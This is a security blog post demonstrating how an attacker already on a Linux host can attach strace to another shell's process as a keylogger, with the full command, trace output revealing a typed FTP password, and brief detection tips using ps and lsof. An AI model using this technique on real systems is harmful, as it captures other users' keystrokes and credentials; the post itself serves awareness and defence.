Friday, April 18, 2014

The Poor Man’s Keylogger – strace

The strace tool is commonly used for debugging applications in Linux, tracing system calls and signals. Because it is more than likely already a part of your OS, we will look at how an attacker can use a tool which is already there to his advantage.
Assumption: The attacker is currently on the machine we are using

For this example, we will perform the following:
1.            Initiate and attach strace to a specific PID
2.            Capture all key strokes from this PID and or any child it forks (creates)
3.            Store this information to a file for offline analysis

Let’s begin!

Let’s see what shells we currently have available
root@securitynik:~# ps aux | grep bash
root      3103  0.0  0.6   6140  3392 pts/0    Ss+  17:14   0:00 bash
root      3199  0.0  0.6   6140  3540 pts/1    Ss   17:18   0:00 bash
root      3373  0.0  0.1   3488   768 pts/1    S+   18:06   0:00 grep bash

Hmmm. Let’s see which one belongs to us
root@securitynik:~# tty
/dev/pts/1

Looks like we are currently using /dev/pts/1. Guess that means /dev/pts/0 is the one we should hook into. Let’s do that.

Let’s start strace and send it to the background
root@securitynik:~# strace -p 3103 -t -e write -q -f -o keylogger.txt &
[1] 3432

Above we are telling strace to do the following:
1. –p 3103: connect to PID 3103, which above is on pts/0
2. –t : print the time of day
3. –e write: only capture write calls
4. –q : be quiet
5. –f : follow any fork (created) process
6. –o keylogger.txt: output the results to a file named keylogger.txt

using the console with the PID 3103 let’s run a few commands and connect to a remote system running FTP:
root@securitynik:~# id
uid=0(root) gid=0(root) groups=0(root)
root@securitynik:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash

root@securitynik:~# ftp 192.168.0.50
Connected to 192.168.0.50.
220 Microsoft FTP Service
Name (192.168.0.50:root): administrator
331 Password required for administrator.
Password:
230-Welcome to securitynik FTP Server :-D
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> exit
221 Do return soon :-)

So the above commands were run but what did we capture?
Let’s find out … the file will be truncated for brevity
root@securitynik:~# cat keylogger.txt | more
-------- results from the ID command ---------
    
3103  18:20:51 write(2, "i", 1)         = 1
3103  18:20:51 write(2, "d", 1)         = 1
3103  18:20:52 write(2, "\n", 1)        = 1
3449  18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"..., 39) = 39

--------- results from cat /etc/passwd
3103  18:20:57 write(2, "c", 1)         = 1
3103  18:20:57 write(2, "a", 1)         = 1
3103  18:20:57 write(2, "t", 1)         = 1
3103  18:20:57 write(2, " ", 1)         = 1
3103  18:20:58 write(2, "/", 1)         = 1
3103  18:20:58 write(2, "e", 1)         = 1
3103  18:20:58 write(2, "t", 1)         = 1
……..
3103  18:20:59 write(3, "/etc", 4)      = 4
3103  18:20:59 write(3, "\n", 1)        = 1
3103  18:20:59 write(2, "c/", 2)        = 2
3103  18:21:01 write(2, "p", 1)         = 1
3103  18:21:01 write(2, "a", 1)         = 1
3103  18:21:01 write(2, "s", 1)         = 1
3103  18:21:01 write(2, "s", 1)         = 1
3103  18:21:01 write(2, "w", 1)         = 1
3103  18:21:02 write(2, "d", 1)         = 1
3103  18:21:02 write(2, "\n", 1)        = 1
3468  18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 2279) = 2279

---------- and last but not least the results from the FTP session --------
103  18:21:02 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103  18:21:17 write(2, "f", 1)         = 1
3103  18:21:18 write(2, "t", 1)         = 1
3103  18:21:18 write(2, "p", 1)         = 1
…..
3103  18:21:24 write(2, "1", 1)         = 1
3103  18:21:24 write(2, "9", 1)         = 1
3103  18:21:24 write(2, "2", 1)         = 1
3103  18:21:24 write(2, ".", 1)         = 1
3103  18:21:25 write(2, "1", 1)         = 1
3103  18:21:25 write(2, "6", 1)         = 1
3103  18:21:25 write(2, "8", 1)         = 1
3103  18:21:26 write(2, ".", 1)         = 1
3103  18:21:26 write(2, "0", 1)         =
3103  18:21:26 write(2, ".", 1)         = 1
3103  18:21:26 write(2, "5", 1)         = 1
3103  18:21:26 write(2, "0", 1)         = 1
3103  18:21:27 write(2, "\n", 1)        = 1
3470  18:21:27 write(1, "Connected to 192.168.0.50.\n", 27) = 27
3470  18:21:27 write(1, "220 Microsoft FTP Service\n", 26) = 26
3470  18:21:27 write(1, "Name (192.168.0.50:root): ", 26) = 26
3470  18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470  18:21:31 write(1, "331 Password required for admini"..., 41) = 41
3470  18:21:31 write(6, "Password:", 9) = 9
3470  18:21:35 write(6, "\n", 1)        = 1
3470  18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470  18:21:35 write(1, "230-Welcome to securitynik FTP S"..., 42) = 42
3470  18:21:35 write(1, "230 User administrator logged in"..., 34) = 34
3470  18:21:35 write(5, "SYST\r\n", 6)  = 6
3470  18:21:35 write(1, "Remote system type is Windows_NT"..., 34) = 34
3470  18:21:35 write(1, "ftp> ", 5)     = 5
3470  18:21:38 write(1, "d", 1)         = 1
3470  18:21:39 write(1, "i", 1)         = 1
3470  18:21:39 write(1, "r", 1)         = 1
3470  18:21:39 write(1, "\n", 1)        = 1
3470  18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n", 26) = 26
3470  18:21:39 write(1, "200 PORT command successful.\n", 29) = 29
3470  18:21:39 write(5, "LIST\r\n", 6)  = 6
3470  18:21:39 write(1, "150 Opening ASCII mode data conn"..., 52) = 52
3470  18:21:39 write(1, "226 Transfer complete.\n", 23) = 23
3470  18:21:39 write(1, "ftp> ", 5)     = 5
3470  18:21:43 write(1, "e", 1)         = 1
3470  18:21:43 write(1, "x", 1)         = 1
3470  18:21:44 write(1, "i", 1)         = 1
3470  18:21:44 write(1, "t", 1)         = 1
3470  18:21:44 write(1, "\n", 1)        = 1
3470  18:21:44 write(5, "QUIT\r\n", 6)  = 6
3470  18:21:44 write(1, "221 Do return soon :-) \n", 24) = 24
3103  18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---
3103  18:21:44 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70

As can be seen, the tools on our systems can easily be used for good just as it can for bad. 

How to mitigate this?
Be aware of what processes you expect to see on your systems
If you don’t use strace for debugging and see it in your “ps aux” output, then you may need to investigate why it may be there.

 root@securitynik:~# ps aux | grep strace
root      3432  0.0  0.1   2088   644 pts/1    S    18:15   0:00 strace -p 3103 -t -e write -q -f -o keylogger.txt

Further checks
root@securitynik:~# lsof | grep strace
strace    3432            root  cwd       DIR        8,1     4096     785892 /root
strace    3432            root  rtd       DIR        8,1     4096          2 /
strace    3432            root  txt       REG        8,1   207880     785911 /usr/bin/strace
strace    3432            root  mem       REG        8,1  1441960     655121 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
strace    3432            root  mem       REG        8,1   117960     679406 /lib/i386-linux-gnu/ld-2.13.so
strace    3432            root    0u      CHR      136,1      0t0          4 /dev/pts/1
strace    3432            root    1u      CHR      136,1      0t0          4 /dev/pts/1
strace    3432            root    2u      CHR      136,1      0t0          4 /dev/pts/1
strace    3432            root    3w      REG        8,1     4782     800789 /root/keylogger.txt


No comments:

Post a Comment